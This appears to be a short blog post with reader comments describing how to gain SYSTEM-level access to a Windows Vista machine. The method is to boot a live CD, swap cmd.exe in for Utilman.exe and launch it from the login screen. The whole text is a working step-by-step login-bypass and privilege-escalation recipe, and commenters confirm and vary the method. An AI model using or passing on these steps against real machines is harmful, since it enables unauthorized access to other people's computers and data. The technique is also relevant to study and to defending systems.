SYSTEM user with Vista - geschonneck.com

Do you have physical access to a Vista box and need to become SYSTEM user? Try this one:

boot the Vista box with BackTrack or some other Live CD
mount the NTFS partition
rename c:\Windows\System32\Utilman.exe
copy c:\Windows\System32\cmd.exe to c:\Windows\System32\Utilman.exe
reboot
at the login screen: start Utilman with „Windows key + U“
start CMD.EXe
start EXPLORER.EXE
done!

The way I done this was within the Vista OS, just rename utilman.exe then change the name of cmd.exe to utilman.exe (you may have to change some things in the security tab of the two-i did!) and then once you have done this just press the windows key and u and it will open the system cmd, then type explorer.exe!

Great! All you need is physical access to the machine and the right to enter the BIOS and change the boot device priority (-;
